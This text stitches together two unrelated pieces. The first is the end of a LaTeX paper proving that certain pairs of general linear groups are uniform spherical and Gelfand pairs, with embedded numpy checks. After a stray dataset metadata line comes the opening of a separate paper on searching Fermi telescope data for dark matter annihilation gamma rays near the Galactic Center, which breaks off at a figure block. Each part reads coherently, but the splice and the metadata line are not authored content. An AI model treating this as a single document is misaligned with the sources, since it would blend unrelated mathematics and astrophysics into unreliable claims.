\item Denote the projections $G\to\GL_{n_j}$ by $\pi_j$. Assume that $x,y\in G(F)$, and there is a pair $(\overline{a},\overline{b})\in (A\times B)(\overline{F})$ such that $\overline{a}x\overline{b}=y$. Let $L\subset M_A\times M_B$ be the \Dima{affine} subspace $\{(\alpha,\beta)| \alpha x=y\beta\}$, defined over $F$. By assumption, the functions $(\alpha,\beta)\mapsto \det\pi_j(\alpha)$ and $(\alpha,\beta)\mapsto\det\pi_j(\beta)$, for $j=1,\ldots,k$, are non-zero on $L(\overline{F})$. Hence there is $(a,b)\in L(F)\cap G$, which means that $axb^{-1}=y$, i.e., $(a,b^{-1})$ is an $F$-rational point of the variety in question.
\item Applying (1) to $A$ and \Dima{any} parabolic subgroup $B\subset G$, any $(A\times B)(\overline{F})$-orbit in $G(\overline{F})$ contains at most one $(A\times B)(F)$-orbit. Since there are only finitely many $(A\times B)(\overline{F})$-orbits in $G(\overline{F})$, the pair $(G,A)$ is $F$-spherical.
\end{enumerate}
\end{proof}
\subsection{The Pair $(\GL_{n+k},\GL_n \times\GL_k)$}
\lbl{subsec:JR}$ $
In this subsection we assume $p\neq 2$ and consider only local fields of characteristic
different from 2.
Let $G:=(\GL_{n+k})_R$ and $H:=(\GL_n)_R \times (\GL_k)_R < G$ be the subgroup of
block matrices. Note that $H$ is a symmetric subgroup since it
consists of fixed points of conjugation by $\epsilon =
\begin{pmatrix}
Id_{k} & 0 \\
0 & -Id_{n}
\end{pmatrix}$. We prove that $(G,H)$ is a Gelfand pair
using Corollary \ref{cor:GelGel}.
The pair $(G,H)$ is a symmetric pair, hence it is a spherical pair and therefore by Proposition \ref{peop:F.sph} it is $F$-spherical.
The second condition of Corollary \ref{cor:GelGel}
is \cite[Theorem 1.1]{JR}. It
remains to prove that $(G,H)$ is a uniform spherical pair.
\begin{prop} \lbl{prop:JR}
The pair $(G,H)$ is uniform spherical.
\end{prop}
\begin{proof}
Without loss of generality suppose that $n \geq k$.
Let $\mathfrak X=\{x_0\}$, where
$$
x_0:=\begin{pmatrix}
Id_{k} & 0 & Id_{k} \\
0 & Id_{n-k} & 0\\
0 & 0 & Id_k
\end{pmatrix} H \text{ and } \Upsilon=\{(\mu_1,...,\mu_k,0,...,0) \in X_*(T) \, | \, \mu_1 \leq ... \leq
\mu_k \leq 0\}.$$
To show the first condition we show that every double
coset in $K_0\backslash G/H$ includes an element of the form
$\begin{pmatrix}
Id_{k} & 0 & diag(\pi^{\mu_1},...,\pi^{\mu_k}) \\
0 & Id_{n-k} & 0\\
0 & 0 & Id_k
\end{pmatrix}\text{ s.t. } \mu_1 \leq ... \leq
\mu_k \leq 0.$ Take any $g \in G$. By left multiplication by $K_0$
we can bring it to upper triangular form. By right multiplication
by $H$ we can bring it to a form $\begin{pmatrix}
Id_{n} & A \\
0 & Id_{k}
\end{pmatrix}$. Conjugating by a matrix $\begin{pmatrix}
k_1 & 0 \\
0 & k_2
\end{pmatrix}\in K_0 \cap H$ we can replace it by $\begin{pmatrix}
Id_{n} & k_1Ak_2^{-1} \\
0 & Id_{k}
\end{pmatrix}$. Hence we can bring $A$ to be a $k$-by-$(n-k)$ block of zeros, followed by a diagonal matrix of the form $diag(\pi^{\mu_1},...,\pi^{\mu_k})$ such that $\mu_1 \leq ... \leq
\mu_k .$ Multiplying by an element of
$K_0$ of the form $\begin{pmatrix}
Id_{k} & 0 & k \\
0 & Id_{n-k} & 0\\
0 & 0 & Id_k
\end{pmatrix}$ we can bring $A$ to the desired form. \\
As for the second condition, we first compute the stabilizer ${G}_{x_0}$ of $x_0$ in $G$.
Note that the coset $x_0 \in G/H$ equals
$$ \left \{
\begin{pmatrix}
g_1 & g_2 & h \\
g_3 & g_4 & 0\\
0 & 0 & h
\end{pmatrix}
| \begin{pmatrix}
g_1 & g_2 \\
g_3 & g_4
\end{pmatrix} \in (\GL_n)_R,\, h \in (\GL_k)_R \right \}$$
and
$$\begin{pmatrix}
A & B & C\\
D & E & F\\
G & H & I
\end{pmatrix}
\begin{pmatrix}
Id_{k} & 0 & Id_{k} \\
0 & Id_{n-k} & 0\\
0 & 0 & Id_k
\end{pmatrix} = \begin{pmatrix}
A & B & A+C\\
D & E & D+F\\
G & H & G+I
\end{pmatrix}.$$
Hence $$G_{x_0}= \left \{ \begin{pmatrix}
g_1 & g_2 & h - g_1 \\
g_3 & g_4 & -g_3\\
0 & 0 & h
\end{pmatrix}
| \begin{pmatrix}
g_1 & g_2 \\
g_3 & g_4
\end{pmatrix} \in (\GL_n)_R,\, h \in (\GL_k)_R \right \}.$$
Therefore, for any $\lambda_1 = (\lambda_{1,1},...,\lambda_{1,k},0,...,0), \lambda_2 = (\lambda_{2,1},...,\lambda_{2,k},0,...,0)\in
\Upsilon$,
\begin{multline*}
{G(F)}_{\pi^{\lambda_1}x_0,\pi^{\lambda_2}x_0} = \left \{ \begin{pmatrix}
\pi^{\lambda_2}g_1\pi^{-\lambda_1} & \pi^{\lambda_2}g_2 & \pi^{\lambda_2}(h - g_1) \\
g_3\pi^{-\lambda_1} & g_4 & -g_3\\
0 & 0 & h
\end{pmatrix}\, |\,
\begin{pmatrix}
g_1 & g_2 \\
g_3 & g_4
\end{pmatrix} \in (\GL_n)_R,\, h \in (\GL_k)_R \right \}=\\
= \left \{ \begin{pmatrix}
A & B & C \\
D & E & F\\
0 & 0 & I
\end{pmatrix}\in GL_{n+k} \,|\, D=-F\pi^{-\lambda_1},\, C=\pi^{\lambda_2}I-A\pi^{\lambda_1} \right \}.
\end{multline*}
The second condition of Definition \ref{defn:good.pair} follows now from Lemma
\ref{lem:SmoothCrit}.\\
As for the third condition, we use the embedding $G/H\to G$ given by $g\mapsto g\epsilon g^{-1} \epsilon$. It is easy to see that $val_F(\pi^\mu x_0)=\mu_1,$ which
is independent of $F$.
\DimaGRCor{ Let us now prove the last condition using Lemma
\ref{lem:GRCrit}. Take $\ell_0=1$ and $$P:= \left \{ \begin{pmatrix}
Id & 0 & 0 \\
D & E & F\\
G & H & I
\end{pmatrix}\in GL_{n+k} \right \}.$$
Let $P_\ell:=P(F)\cap K_\ell(GL_{n+k},F).$
The first condition of Lemma \ref{lem:GRCrit} obviously holds. To
show the second condition, we have to show that for any $F$, any
$\ell \geq 1$ and any $g \in K_\ell(GL_{n+k},F)$ there exist $p \in
P_\ell$ and $h\in H(F)$ such that $gx_0=
px_0h$. In other words, we have to solve the following equation:
$$
\begin{pmatrix}
Id_k+A & B & Id_k+A+C\\
D & Id_{n-k}+E & D+F\\
G & H & Id_k+G+I
\end{pmatrix}=
\begin{pmatrix}
Id_k & 0 & Id_k\\
D' & Id_{n-k}+E' & D'+F'\\
G' & H' & Id_k+G'+I'
\end{pmatrix}
\begin{pmatrix}
Id_k+x & y & 0\\
z & Id_{n-k}+w & 0\\
0 & 0 & Id_k+h
\end{pmatrix},
$$
where all the \RGRCor{capital} letters denote matrices of appropriate sizes with entries in $\pi^l\mathcal O_F$, and the matrices in the left hand side are parameters and matrices in the right hand side are unknowns.
The solution is given by:
\begin{multline*}
x=A, \quad y=B, \quad z=D , \quad \RGRCor{w=} E , \quad h= A+C \\
D' = 0, \quad E'=0, \quad F' = (D+F) (Id_k +A+C)^{-1},\\
H'=(H-G(Id_k+A)^{-1}B)(-D(Id_k+A)^{-1}B+Id_{n-k}+E)^{-1}\\
G'=(G-H'D)(Id_k+A)^{-1}, \quad
I'=(G+I-A-C)(Id_k+A+C)^{-1} - G'
\end{multline*}}
\end{proof}
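The explicit solution displayed at the end of the proof can be checked mechanically: substituting the formulas for $x,y,z,w,h$ and $D',E',F',G',H',I'$ back into the right-hand side reproduces the left-hand side, block by block. A numerical sanity check (our own, with small random real entries standing in for elements of $\pi^\ell O_F$; numpy is assumed):

```python
import numpy as np

rng = np.random.default_rng(1)
n, k = 3, 2                      # n >= k; the middle block has size m = n - k
m = n - k
rnd = lambda r, c: 0.01 * rng.standard_normal((r, c))
Ik, Im, inv = np.eye(k), np.eye(m), np.linalg.inv

A, C, G, I = rnd(k, k), rnd(k, k), rnd(k, k), rnd(k, k)
B, H = rnd(k, m), rnd(k, m)
D, F = rnd(m, k), rnd(m, k)
E = rnd(m, m)

# left-hand side of the equation, in block form
M = np.block([[Ik + A, B,      Ik + A + C],
              [D,      Im + E, D + F],
              [G,      H,      Ik + G + I]])

# the solution displayed in the proof (with D' = E' = 0)
x, y, z, w, h = A, B, D, E, A + C
Fp = (D + F) @ inv(Ik + A + C)
Hp = (H - G @ inv(Ik + A) @ B) @ inv(-D @ inv(Ik + A) @ B + Im + E)
Gp = (G - Hp @ D) @ inv(Ik + A)
Ip = (G + I - A - C) @ inv(Ik + A + C) - Gp

Zkk, Zkm, Zmk = np.zeros((k, k)), np.zeros((k, m)), np.zeros((m, k))
P = np.block([[Ik,  Zkm,    Ik],
              [Zmk, Im,     Fp],
              [Gp,  Hp,     Ik + Gp + Ip]])
X = np.block([[Ik + x, y,      Zkk],
              [z,      Im + w, Zmk],
              [Zkk,    Zkm,    Ik + h]])

assert np.allclose(P @ X, M)     # the two sides agree, block by block
```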
\subsection{Structure of the spherical space $(\GL_{n+1}\times\GL_n)/\Delta \GL_n$} \lbl{subsec:PfGood}
Consider the embedding $\iota:\GL_n\hookrightarrow \GL_{n+1}$
given by
\[
A\mapsto\left( \begin{matrix} 1&0\\0&A\end{matrix}\right).
\]
Denote $G=\GL_{n+1}(F)\times\GL_n(F)$ and $H=\Delta \GL_n(F)$.
The quotient space $G/H$ is isomorphic to $\GL_{n+1}(F)$ via the map
$(g,h)\mapsto g\iota(h^{-1})$. Under this isomorphism, the action
of $G$ on $G/H$ becomes $ (g,h)\cdot X=gX\iota(h^{-1})$.
The space $G/H$ is spherical.
Indeed, let $B\subset G$ be the
Borel subgroup consisting of pairs $(b_1,b_2)$, where $b_1$ is
lower triangular and $b_2$ is upper triangular, and let $x_0\in G/H$
be the point represented by the matrix
\[
x_0=\bmat1&e\\0&I\end{matrix}\right),
\]
where $e$ is a row vector of 1's. We claim that $Bx_0$ is open in
$G/H$. Let $\mathfrak b$ be the Lie algebra of $B$. It consists of pairs
$(X,Y)$ where $X$ is lower triangular and $Y$ is upper triangular.
The infinitesimal action of $\mathfrak b$ on $X$ at $x_0$ is given by
$(X,Y)\mapsto Xx_0-x_0d\iota(Y)$. To show that the image is
$\M_{n+1}$, it is enough to show that the images of the maps
$X\mapsto Xx_0$ and $Y\mapsto x_0d\iota(Y)$ have trivial
intersection. Suppose that $Xx_0=x_0d\iota(Y)$. Then
$X=x_0d\iota(Y)x_0^{-1}$, i.e.
\[
X=\bmat1&e\\&I\end{matrix}\right)\bmat0&0\\0&Y\end{matrix}\right)\bmat1&-e\\&I\end{matrix}\right)=\bmat0&eY\\0&Y\end{matrix}\right).
\]
Since $X$ is lower triangular and $Y$ is upper triangular, both
have to be diagonal. But $eY=0$ implies that $Y=0$, and hence also
$X=0$. Proposition \ref{peop:F.sph} implies that the pair $(G,H)$ is $F$-spherical.
The following describes the quotient $G(O_F)\backslash G(F)/H(F)$.
\begin{lem} \lbl{lem:singular.values} For every matrix $A\in\M_{n+1}(F)$ there are $k_1\in\GL_{n+1}(O)$ and $k_2\in\GL_n(O)$ such that
\begin{equation} \lbl{eq:pi.la}
k_1A\iota(k_2)=\left( \begin{matrix}\pi^a&\pi^{b_1}&\pi^{b_2}&\dots&\pi^{b_n}\\&\pi^{c_1}&&&\\ &&\pi^{c_2}&\\&&&\ddots&\\ &&&&\pi^{c_n}\end{matrix}\right),
\end{equation}
where the numbers $a,b_i,c_i$ satisfy that if $i<j$ then $c_i-c_j\leq b_i-b_j\leq0$ and $b_1\leq c_1$.
\end{lem}
\begin{proof} Let $a$ be the minimal valuation of an element in the first column of $A$. There is an integral matrix $w_1$ such that the first column of the matrix $w_1A$ is $\pi^a,0,0,\ldots,0$. Let $C$ be the $n\times n$ lower-right sub-matrix of $w_1A$. By Cartan decomposition, there are integral matrices $w_2,w_3$ such that $w_2Cw_3^{-1}$ is diagonal, and its diagonal entries are $\pi^{c_i}$ for a non-decreasing sequence $c_i$. Finally, there are integral and diagonal matrices $d_1,d_2$ such that the matrix $d_1\iota(w_2)w_1A\iota(w_3^{-1})\iota(d_2^{-1})$ has the form (\ref{eq:pi.la}).
Suppose that $i<j$ and $b_i>b_j$. Then adding the $j$'th column to the $i$'th column and subtracting $\pi^{c_j-c_i}$ times the $i$'th row from the $j$'th row, we can change the matrix (\ref{eq:pi.la}) so that $b_i=b_j$. Similarly, if $i<j$ and $b_i-b_j<c_i-c_j$, then adding $\pi^{b_j-b_i-1}$ times the $i$'th column to the $j$'th column, and subtracting $\pi^{c_i+b_j-b_i-1-c_j}$ times the $j$'th row from the $i$'th row, changes the matrix (\ref{eq:pi.la}) so that $b_j$ becomes smaller by $1$. Finally, if $c_1<b_1$ then adding the second row to the first changes the matrix so that $c_1=b_1$.
\end{proof}
Let $T\subset G$ be the torus
consisting of pairs $(t_1,t_2)$ such that $t_i$ are diagonal. The
co-character group of $T$ is the group $\mathbb Z^{n+1}\times\mathbb Z^n$. The
positive Weyl chamber of $T$ that is defined by $B$\footnote{The positive Weyl chamber defined by the Borel $B$ is the subset of co-weights $\lambda$ such that $\pi^{\lambda}B(O)\pi^{-\lambda}\subset B(O)$} is the set
$\Delta\subset X_*(T)$ consisting of pairs $(\mu,\nu)$ such that the
$\mu_i$'s are non-decreasing and the $\nu_i$'s are non-increasing.
Lemma \ref{lem:singular.values} implies that the set
$\left\{\pi^\lambda x_0\right\}_{\lambda\in\Delta}$ is a complete set of
orbit representatives for $G(O)\backslash G(F)/H(F)$.\\
We are ready to prove that $(G,H)$ is uniform spherical.
\begin{prop} \lbl{prop:good.pair.GLn+1xGLn} The pair $((\GL_{n+1})_R\times(\GL_n)_R, \Delta (\GL_n)_R)$ is uniform spherical.
\end{prop}
\begin{proof}
Let $\Upsilon\subset X_*(T)$ be the positive Weyl chamber and let $\mathfrak X:=\{x_0\}$. By the above, the first condition of Definition \ref{defn:good.pair} holds. As for the second condition, an easy computation shows that if $a,b_1,\ldots,b_n,c_1,\ldots,c_n\in\mathbb Z$, $a',b_1',\ldots,b_n',c_1',\ldots,c_n'\in\mathbb Z$ satisfy the conclusion of Lemma \ref{lem:singular.values}, and $(k_1,k_2)\in G(O)$ satisfy that
\[
k_1\left( \begin{matrix}\pi^a&\pi^{b_1}&\pi^{b_2}&\dots&\pi^{b_n}\\&\pi^{c_1}&&&\\ &&\pi^{c_2}&\\&&&\ddots&\\ &&&&\pi^{c_n}\end{matrix}\right)\iota(k_2)=\left( \begin{matrix}\pi^{a'}&\pi^{b_1'}&\pi^{b_2'}&\dots&\pi^{b_n'}\\&\pi^{c_1'}&&&\\ &&\pi^{c_2'}&\\&&&\ddots&\\ &&&&\pi^{c_n'}\end{matrix}\right),
\]
then $a=a'$, $c_i=c_i'$, $k_1$ has the form $\bmat1&B\\0&D\end{matrix}\right)$,
where $B$ is a $1\times n$ matrix and $D$ is an $n\times n$ matrix
that satisfy the equations $D=\pi^c k_2\pi^{-c}$ and
$B\pi^c=\pi^b-\pi^{b'}k_2$, where $\pi^c$ denotes the diagonal
matrix with entries $\pi^{c_1},\ldots,\pi^{c_n}$, $\pi^b$ denotes
the row vector with entries $\pi^{b_i}$, and $\pi^{b'}$ denotes
the row vector with entries $\pi^{b_i'}$. The second condition of
Definition \ref{defn:good.pair} holds by Lemma \ref{lem:SmoothCrit}.
\RGRCor{The} third condition follows because, using the affine embedding as above,
$\pi^\lambda x_0$
has the form (\ref{eq:pi.la}) and so
$val_F(\pi^\lambda x_0)$
is independent of $F$.
\RGRCor{
Finally, it is left to verify the last condition. In the following, we will distinguish between the $\ell$th congruence subgroup in $\GL_{n+1}(F)$, which we denote by $K_\ell(\GL_{n+1}(F))$, the $\ell$th congruence subgroup in $\GL_{n}(F)$, which we denote by $K_\ell(\GL_{n}(F))$, and the $\ell$th congruence subgroup in $G=\GL_{n+1}(F)\times\GL_n(F)$, which we denote by $K_\ell$. By Lemma \ref{lem:GRCrit} it is enough to show that $(B\cap K_\ell) x_0=K_\ell x_0.$ It is easy to see that $K_\ell x_0= x_0+\pi^{\ell}Mat_{n+1}(O_{F}).$ Let $y \in x_0+\pi^{\ell}Mat_{n+1}(O_{F})$. We have to show that $y\in (B\cap K_\ell) x_0$. In order to do this, let us represent $y$ as a block matrix $$y=\left( \begin{matrix} a&b\\c&D\end{matrix}\right),$$ where $a$ is a scalar and $D$ is an $n\times n$ matrix. Using left multiplication by a lower triangular matrix from $K_\ell(\GL_{n+1}(F))$ we may bring $y$ to the form $\bmat1&b'\\0&D'\end{matrix}\right)$. We can decompose $D'=LU$, where $L,U \in K_\ell(\GL_{n}(F))$, $L$ is lower triangular, and $U$ is upper triangular. Therefore, by the action of an element from $B\cap K_\ell$, we may bring $y$ to the form $\bmat1&b''\\0&Id\end{matrix}\right)$. Using right multiplication by a diagonal matrix from $K_\ell(\GL_{n+1}(F))$ (with first entry 1) we may bring $y$ to the form $\bmat1&e\\0&D''\end{matrix}\right),$ where $e$ is a row vector of 1's and $D''$ is a diagonal matrix. Finally, using left multiplication by a diagonal matrix from $K_\ell(\GL_{n+1}(F))$ we may bring $y$ to $x_0.$
}
\end{proof}
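The chain of moves in the last paragraph can be exercised numerically: starting from a perturbation $y=x_0+\varepsilon$, the four steps (clear the first column, $LU$-factor the lower block, rescale columns, rescale rows) recover $x_0$. The sketch below is our own translation of those steps, with small real entries standing in for $\pi^\ell O_F$ and a hand-rolled pivot-free Doolittle $LU$ routine; numpy is assumed:

```python
import numpy as np

rng = np.random.default_rng(2)
n = 3
x0 = np.eye(n + 1); x0[0, 1:] = 1.0           # x0 = [[1, e], [0, Id]]
y = x0 + 0.01 * rng.standard_normal((n + 1, n + 1))

def lu_nopivot(S):                            # Doolittle: S = L @ U, L unit lower
    r = S.shape[0]
    L, U = np.eye(r), S.astype(float).copy()
    for j in range(r):
        for i in range(j + 1, r):
            L[i, j] = U[i, j] / U[j, j]
            U[i] -= L[i, j] * U[j]
    return L, U

emb = lambda h: np.block([[np.eye(1), np.zeros((1, n))],
                          [np.zeros((n, 1)), h]])   # iota: GL_n -> GL_{n+1}

# step 1: a lower triangular left multiplication clears the first column
L1 = np.eye(n + 1)
L1[0, 0] = 1 / y[0, 0]
L1[1:, 0] = -y[1:, 0] / y[0, 0]
y1 = L1 @ y                                   # [[1, b'], [0, D']]

# step 2: D' = LU; act on the left by iota(L)^{-1} and on the right by iota(U)^{-1}
L, U = lu_nopivot(y1[1:, 1:])
y2 = emb(np.linalg.inv(L)) @ y1 @ emb(np.linalg.inv(U))   # [[1, b''], [0, Id]]

# step 3: right multiplication by a diagonal matrix sends b'' to e
d = np.diag(1 / y2[0, 1:])
y3 = y2 @ emb(d)                              # [[1, e], [0, d]]

# step 4: left multiplication by a diagonal matrix restores the identity block
y4 = emb(np.linalg.inv(d)) @ y3
assert np.allclose(y4, x0)
```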
\subsection{The Pair $(\GL_{n+1}\times\GL_n,\Delta \GL_n)$}
\lbl{subsec:GL}$ $
In this section we prove Theorem \ref{thm:Mult1} which states that
$(\GL_{n+1}(F),\GL_n(F))$ is a strong Gelfand pair for any local
field $F$, i.e. for any irreducible smooth representations $\pi$
of $\GL_{n+1}(F)$ and $\tau$ of $\GL_{n}(F)$ we have
$$\dim \Hom_{\GL_{n}(F)} (\pi, \tau) \leq 1.$$
It is well known (see e.g. \cite[section 1]{AGRS})
that this theorem is equivalent to the statement that
$(\GL_{n+1}(F)\times\GL_n(F),\Delta \GL_n(F))$, where $\Delta
\GL_n$ is embedded in $\GL_{n+1}\times\GL_n$ by the map
$\iota\times Id$, is a Gelfand pair.
By Corollary \ref{cor:GelGel} this statement follows from Proposition \ref{prop:good.pair.GLn+1xGLn}, and the following
\RGRCor{theorem:}
\begin{thm}[\cite{AGRS}, Theorem 1]
Let $F$ be a local field of characteristic 0. Then
$(\GL_{n+1}(F),\GL_n(F))$ is a strong Gelfand pair.
\end{thm}
| 2024-02-18T23:40:06.609Z | 2011-07-07T02:01:48.000Z | algebraic_stack_train_0000 | 1,365 | 16,851 |
|
proofpile-arXiv_065-6727 | \section{Introduction}
Searches for dark matter annihilation products are among the most exciting missions of the Fermi Gamma Ray Space Telescope (FGST). In particular, the FGST collaboration hopes to observe and identify gamma rays from dark matter annihilations occuring cosmologically~\cite{cosmo}, as well as within the Galactic Halo~\cite{halo}, dwarf galaxies~\cite{dwarf}, microhalos~\cite{micro}, and the inner region of the Milky Way~\cite{inner}.
Due to the very high densities of dark matter predicted to be present in the central region of our galaxy, the inner Milky Way is expected to be the single brightest source of dark matter annihilation radiation in the sky. This region is astrophysically rich and complex, however, making the task of separating dark matter annihilation products from backgrounds potentially challenging. In particular, the Galactic Center contains a $2.6\times 10^6\, M_{\odot}$ black hole coincident with the radio source Sgr A$^*$~\cite{ghez}, the supernova remnant Sgr A East, and a wide variety of other notable astrophysical objects, including massive O and B type stars, and massive compact star clusters (Arches and Quintuplet).
Since its launch in June of 2008, the Large Area Telescope (LAT) onboard the FGST has identified several hundred thousand events as photons from within a few degrees around the Galactic Center. In addition to possessing the effective area required to accumulate this very large number of events, the angular resolution and energy resolution of the FGST's LAT are considerably improved relative to those of its predecessor EGRET. As a result, this new data provides an opportunity to perform a powerful search for evidence of dark matter annihilation~\cite{fermidark}.
Dark matter annihilations are predicted to produce a distribution of gamma rays described by:
\begin{equation}
\Phi_{\gamma}(E_{\gamma},\psi) =\frac{1}{2} \langle\sigma v\rangle \frac{dN_{\gamma}}{dE_{\gamma}} \frac{1}{4\pi m^2_{\rm{dm}}} \int_{\rm{los}} \rho^2(r)\, dl(\psi)\, d\psi,
\label{flux1}
\end{equation}
where $\langle\sigma v\rangle$ is the dark matter particle's self-annihilation cross section (multiplied by velocity), $m_{\rm dm}$ is the dark matter particle's mass, $\psi$ is the angle away from the direction of the Galactic Center that is observed, $\rho(r)$ describes the dark matter density profile, and the integral is performed over the line-of-sight. $dN_{\gamma}/dE_{\gamma}$ is the spectrum of prompt gamma rays generated per annihilation, which depends on the dominant annihilation channel(s). Note that Eq.~\ref{flux1} provides us with predictions for both the distribution of photons as a function of energy, and as a function of the angle observed. It is this powerful combination of signatures that we will use to identify and separate dark matter annihilation products from astrophysical backgrounds~\cite{method}.
With a perfect gamma ray detector, the distribution of dark matter events observed would follow precisely that described in Eq.~\ref{flux1}. The LAT of the FGST has a finite point spread function, however, which will distort the observed angular distribution. In our analysis, we have modeled the point spread function of the FGST's LAT according to the performance described in Ref.~\cite{performance}.
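To illustrate how a finite angular resolution reshapes a model prediction, the sketch below smears a toy cuspy intensity map with a single Gaussian of fixed width. This is only a schematic stand-in: the actual LAT point spread function is energy-dependent and non-Gaussian, and the $0.3^{\circ}$ width, pixel size, and toy profile used here are illustrative assumptions, not instrument values.

```python
import numpy as np
from scipy.ndimage import gaussian_filter

def smear_with_psf(intensity_map, psf_sigma_deg, pixel_deg):
    """Convolve a model intensity map with a Gaussian stand-in for the
    instrument point spread function (sigma given in degrees)."""
    return gaussian_filter(intensity_map, sigma=psf_sigma_deg / pixel_deg,
                           mode="constant")

# Toy sky map: a regularized cusp ~ theta^-1.2 centered on the origin.
pixel_deg = 0.05                       # illustrative pixel size
half_width = 3.0                       # degrees
n = int(2 * half_width / pixel_deg)
x = (np.arange(n) - n / 2 + 0.5) * pixel_deg
X, Y = np.meshgrid(x, x)
theta = np.sqrt(X**2 + Y**2)
model = (theta + 0.05) ** -1.2

# Smearing with a 0.3 degree Gaussian (an assumed, energy-averaged width)
observed = smear_with_psf(model, psf_sigma_deg=0.3, pixel_deg=pixel_deg)

# The PSF suppresses the central peak while roughly conserving total flux
print(model.max(), observed.max())
```

In the analysis itself the smearing would be applied separately for event classes with different point spread functions, as is done below for front- and back-converting events.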
In addition to any gamma rays from dark matter annihilations coming from the region of the Galactic Center, significant astrophysical backgrounds are known to exist. In particular, HESS~\cite{hess} and other ground-based gamma ray telescopes~\cite{other} have detected a rather bright gamma ray source coincident with the dynamical center of our galaxy ($l=-0.055^{\circ}$, $b=0.0442^{\circ}$). The spectrum of this source has been measured to be a power-law of the form $dN_{\gamma}/dE_{\gamma} \approx 10^{-8} \, {\rm GeV}^{-1}\, {\rm cm}^{-2}\, {\rm s}^{-1} (E/{\rm GeV})^{-2.25}$ between approximately 160 GeV and 20 TeV. Although HESS and other ground-based telescopes cannot easily measure the spectrum of this source at lower energies, it is likely that it will extend well into the range studied by the FGST~\cite{dermer}, where it will provide a significant background for dark matter searches~\cite{gabi}. Furthermore, gamma ray emission from numerous faint point sources and/or truly diffuse sources can provide a formidable background in the region of the Galactic Center, especially near the disk of the Milky Way. To model this background, we have studied the angular distribution of photons observed by the FGST in the region of $3^{\circ}< |l| <6^{\circ}$, and found that the emission is fairly well described by a function which falls off exponentially away from the disk with a scale of roughly $2.2^{\circ}$ to $1.2^{\circ}$ for photons between 300 MeV and 30 GeV, respectively. In addition to the previously described HESS point source, we will use this angular distribution as a template to model the diffuse background in our analysis.
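A fit of the kind used to extract the exponential scale heights quoted above can be sketched on mock data as follows; the count normalization, binning, and noise model are illustrative assumptions, not the values used in the analysis.

```python
import numpy as np
from scipy.optimize import curve_fit

# Mock latitude profile: counts falling exponentially with |b| away from
# the disk. Normalization, binning and scale are illustrative assumptions.
rng = np.random.default_rng(0)
b = np.linspace(0.2, 6.0, 30)                 # Galactic latitude, degrees
true_scale = 2.2                               # degrees
counts = rng.poisson(1000.0 * np.exp(-b / true_scale)).astype(float)

def disk_model(b, norm, scale):
    """Exponential falloff away from the Galactic plane."""
    return norm * np.exp(-b / scale)

popt, pcov = curve_fit(disk_model, b, counts, p0=(800.0, 1.0))
print(popt)    # fitted (normalization, scale height in degrees)
```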
To start, we consider dark matter distributed according to a Navarro-Frenk-White (NFW)~\cite{nfw} halo profile with a scale radius of 20 kpc and normalized such that the dark matter density at the location of the Solar System is equal to its value inferred by observations~\cite{ullio}. This profile, however, combined with the background model described above, leads to a distribution of photons that falls off more slowly as a function of angle from the Galaxy's dynamical center than is observed by the FGST. If we steepen the halo profile slightly, such that $\rho(r) \propto 1/r^{\gamma}$, with $\gamma=1.1$ ($\gamma=1.0$ for an NFW profile), the angular distribution of the events matches the observations of the FGST very well. Such a steepening of the inner cusp could result from, for example, the adiabatic contraction of the profile due to the dynamics of the baryonic gas which dominate the gravitational potential of the Inner Galaxy~\cite{ac}.
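The angular shape entering these fits follows from the line-of-sight integral in Eq.~\ref{flux1} for a generalized profile $\rho(r) \propto r^{-\gamma}(1+r/r_s)^{-(3-\gamma)}$. A minimal numerical sketch is given below; the solar radius, local density, and integration cutoff are illustrative values, and only the $\rho^2$ integral (not the full flux prefactor) is computed.

```python
import numpy as np
from scipy.integrate import quad

# Illustrative parameter values (not fit results from the text):
R_SUN = 8.5       # kpc, galactocentric distance of the Sun
RHO_SUN = 0.3     # GeV/cm^3, local dark matter density
R_S = 20.0        # kpc, profile scale radius

def rho(r, gamma):
    """Generalized NFW profile, rho ~ r^-gamma in the inner region,
    normalized to RHO_SUN at the solar radius."""
    shape = lambda x: x**-gamma * (1.0 + x / R_S)**-(3.0 - gamma)
    return RHO_SUN * shape(r) / shape(R_SUN)

def los_rho2(psi, gamma, l_max=40.0):
    """Integral of rho^2 along the line of sight at angle psi (radians)
    from the Galactic Center; result in GeV^2 cm^-6 kpc."""
    def integrand(l):
        r = np.sqrt(R_SUN**2 + l**2 - 2.0 * R_SUN * l * np.cos(psi))
        return rho(r, gamma)**2
    val, _ = quad(integrand, 0.0, l_max,
                  points=[R_SUN * np.cos(psi)], limit=200)
    return val

# A slightly steeper cusp (gamma = 1.1) brightens the inner degrees
psi = np.radians(0.5)
print(los_rho2(psi, 1.1), los_rho2(psi, 1.0))
```

Comparing $\gamma=1.1$ with $\gamma=1.0$ at fixed local density shows the steeper cusp brightening the inner degrees, which is what drives the improved fit to the angular data.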
In Fig.~\ref{angular}, we show the angular distribution of gamma rays as a function of angle from the Galaxy's dynamical center, as measured by the FGST over the period of August 4, 2008 to October 5, 2009, corresponding to an exposure in the Galactic Center region of approximately $2.2\times 10^{10}$ cm$^2$ sec at 300 MeV, and increasing to between 3.5-4.3 $\times 10^{10}$ cm$^2$ sec between 1 and 300 GeV. We include only those events in the ``diffuse'' class (as defined by the FGST collaboration) and do not include events with zenith angle greater than 105$^{\circ}$, or from the region of the South Atlantic Anomaly. Below 10 GeV, we show separately those events that were converted in the front (thin) and back (thick) regions of the detector (these are treated separately to account for the differing point spread functions for these event classes). In each frame, we compare these measurements to the angular distribution predicted for photon from annihilating dark matter with $\gamma=1.1$, the HESS point source, the diffuse background, and for the sum of these contributions. In each case, these predictions take into account the point spread function of the FGST. For each range of energies shown, we have normalized the diffuse background and dark matter contributions to provide the best fit to the data. Above 1 GeV, the normalization of the HESS source was determined by extrapolating the measured power law spectrum to lower energies, which appears to be consistent with the distribution observed by the FGST. Below 1 GeV, the FGST data do not appear to contain significant emission from this point source, so we suppress this contribution in these energy bins under the assumption that the extrapolation of the HESS spectrum becomes invalid around $\sim 1$ GeV.
\begin{figure*}[!]
\begin{center}
{\includegraphics[angle=0,width=0.37\linewidth]{11eventsangle300-600-frontonly-diskdiffuse.ps}}
\hspace{0.5cm}
{\includegraphics[angle=0,width=0.37\linewidth]{11eventsangle300-600-backonly-diskdiffuse.ps}}\\
{\includegraphics[angle=0,width=0.37\linewidth]{11eventsangle600-1-frontonly-diskdiffuse.ps}}
\hspace{0.5cm}
{\includegraphics[angle=0,width=0.37\linewidth]{11eventsangle600-1-backonly-diskdiffuse.ps}}\\
{\includegraphics[angle=0,width=0.37\linewidth]{11eventsangle1-10-frontonly-diskdiffuse.ps}}
\hspace{0.5cm}
